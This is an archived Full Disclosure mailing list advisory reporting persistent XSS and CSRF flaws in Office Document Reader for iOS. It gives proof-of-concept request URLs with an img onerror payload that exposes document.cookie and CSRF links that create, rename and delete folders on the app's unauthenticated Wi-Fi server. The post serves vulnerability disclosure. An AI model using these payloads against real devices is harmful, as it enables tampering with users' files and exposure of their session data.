| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sun, 3 Jan 2016 01:44:39 +0200 From: "MustLive" <mustlive@...security.com.ua> To: <submissions@...ketstormsecurity.org>, <fulldisclosure@...lists.org> Subject: [FD] Vulnerabilities in Office Document Reader for iOS Hello list! Happy New Year! There are multiple vulnerabilities in Office Document Reader for iOS. There are Cross-Site Scripting and Cross-Site Request Forgery vulnerabilities. Earlier I've informed developer of Office Document Reader about this and other his software. ------------------------- Affected products: ------------------------- Vulnerable are Office Document Reader 5.1.13 for iOS and previous versions. Vulnerable as paid, as free version (at the beginning the paid function works of access via Wi-Fi, which turns on http and ftp server). ------------------------- Affected vendor: ------------------------- LTD DevelSoftware. ---------- Details: ---------- Cross-Site Scripting (WASC-08) (Persistent XSS): http://192.168.0.28/createdir?path=%3Cimg%20src=%271%27%20onerror=%27alert(document.cookie)%27%3E http://192.168.0.28/rename?path=%2FFolder&newpath=%271%27%20onerror=%27alert(document.cookie)%27%3E Cross-Site Scripting (WASC-08) (Persistent XSS): Through FTP it's possible to set name of folder or file with XSS code. The access to http and ftp servers via local networks is not limited (without password). Therefore via uploading it's possible in particular to conduct XSS attack. Cross-Site Request Forgery (WASC-09): The whole functionality is vulnerable to CSRF attacks: creation, renaming and deleting of a folder. http://192.168.0.28/createdir?path=%2FFolder http://192.168.0.28/rename?path=%2FFolder&newpath=%2FFolder2 http://192.168.0.28/delete?path=%2FFolder I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/8092/). Best wishes & regards, Eugene Dokukin aka MustLive Administrator of Websecurity web site http://websecurity.com.ua _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists